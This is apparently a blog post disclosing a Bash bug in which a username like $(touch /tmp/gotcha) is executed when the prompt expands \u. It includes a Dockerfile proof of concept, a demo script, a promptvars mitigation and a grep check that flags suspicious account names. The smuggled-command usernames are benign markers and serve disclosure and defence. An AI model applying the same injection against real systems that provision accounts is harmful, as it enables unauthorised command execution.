Bash Username $PS1 Command Injection

If you create a user named $(some_command), and then start an interactive Bash as that user, some_command gets run. Bash first decodes the prompt escapes in $PS1 (so \u becomes the username), and then, because the promptvars shell option is on by default, runs parameter expansion and command substitution over the decoded prompt, which executes whatever the username smuggled in.

In the fall of 2024, command injection was on my mind. I had just heard Aaron Portnoy give a lecture on CVE-2023-1389, and had recently played with this fun command injection bug. I wondered: if I start cramming $s all over the place, how long will it take before I find some poor shell script that didn't account for evil usernames?

So my friend Jonah and I decided to start by sticking "$(touch /tmp/gotcha)" in a Linux username, and then just run a bunch of commands until /tmp/gotcha showed up in the filesystem. Immediately after logging into the new account, /tmp/gotcha was created. Further, we noticed that the username in the shell prompt was empty. A little bit of investigation revealed that $PS1 was the source of the command injection.

Another friend, Malcolm, wrote up a patch and submitted it to the Bash bug tracker, so this is now fixed.

Proof

Build this Dockerfile:

# useradd normally rejects a name like this; --badname skips its name check.
FROM debian:12
RUN useradd --badname '$(touch /tmp/gotcha)'
# Docker only substitutes $VAR / ${VAR} environment references in USER, so the
# $(...) name passes through literally and the container starts as that account.
USER $(touch /tmp/gotcha)

Then run the image and ls /tmp :) The debian:12 image's default command is bash, so docker run -it <image> drops you into the interactive shell, and Debian's /etc/bash.bashrc sets a PS1 of '${debian_chroot:+($debian_chroot)}\u@\h:\w\$ ', whose \u is what triggers the injection.
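What is going on under the hood, and the two checks you would actually run, as an added example that is not part of the original post or of Malcolm's patch. Bash's ${var@P} transformation expands a string as if it were PS1, so the two-stage expansion can be exercised without creating an account; the hostname "box", the marker path and the passwd(5) sample are constructed for the demo, and the decoded prompt text is substituted by hand because we cannot rename our own account.

```shell
#!/bin/sh
# Added example, not code from the original post or from the Bash fix.
# Bash draws PS1 in two stages:
#   1. prompt escapes are decoded (\u -> username, \h -> hostname, \w -> cwd);
#   2. if the promptvars option is on (the default), the decoded text then
#      undergoes parameter expansion and command substitution.
# A username containing $(...) survives stage 1 and runs in stage 2. Bash's
# ${var@P} transformation (4.4+) expands a string exactly like PS1, so the
# machinery can be exercised without creating an account. Bash is invoked
# explicitly so this file also runs under a plain POSIX sh.

# Expand PROMPT exactly as Bash does when displaying it (promptvars on).
expand_prompt() {
    bash -c 'shopt -s promptvars; printf "%s" "${1@P}"' _ "$1"
}

# Same, with promptvars off: stage 2 is skipped and $(...) stays literal.
expand_prompt_safe() {
    bash -c 'shopt -u promptvars; printf "%s" "${1@P}"' _ "$1"
}

# Reproduce the finding end to end. We cannot rename our own account, so we
# substitute by hand what Debian's PS1 ('\u@\h:\w\$ ') becomes after stage 1
# for the evil user; the hostname "box" is made up. MARKER is the path the
# injected command creates. Note the username vanishes from the shown prompt:
# the command substitution's (empty) output replaces it.
demo_injection() {
    marker=$1
    decoded="\$(touch $marker)@box:~\$ "
    prompt_shown=$(expand_prompt "$decoded")
    if [ -e "$marker" ]; then
        echo "injected command ran; prompt shown as: $prompt_shown"
    else
        echo "nothing ran; prompt shown as: $prompt_shown"
    fi
}

# Defensive check: flag account names that could smuggle an expansion into a
# prompt. Reads passwd(5) lines on stdin, prints the offending names one per
# line, and exits 1 (grep's status) if there are none.
suspicious_usernames() {
    cut -d: -f1 | grep -E '[$`]'
}

# Constructed passwd(5) sample (not from any real system).
SAMPLE_PASSWD='root:x:0:0:root:/root:/bin/bash
alice:x:1000:1000::/home/alice:/bin/bash
$(touch /tmp/gotcha):x:1001:1001::/home/gotcha:/bin/sh
`id`:x:1002:1002::/home/id:/bin/sh'

main() {
    echo "promptvars on : $(expand_prompt 'x$(echo pwned)y')"
    echo "promptvars off: $(expand_prompt_safe 'x$(echo pwned)y')"
    demo_injection "$(mktemp -d)/gotcha"
    echo "suspicious names in sample passwd:"
    printf '%s\n' "$SAMPLE_PASSWD" | suspicious_usernames
}

main "$@"
```

Run it with sh or bash; it only needs a bash on PATH. On an unpatched Bash, shopt -u promptvars in your rc files is the one-line mitigation if you never rely on $(...) in your own prompt; the passwd check is the other place to look, since useradd only accepted this name because of --badname, and anything that provisions accounts without that check deserves the same scan.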

Does this matter?

Probably not! Creating an account with an arbitrary name already takes root, so on most systems there is no privilege boundary being crossed; the place to pay attention is anything that provisions accounts from names it did not choose itself. But it is kind of cool :)

See also

Malcolm covered this bug in a lot more depth in a post of his own. Check it out if you're interested in going more in-depth on this.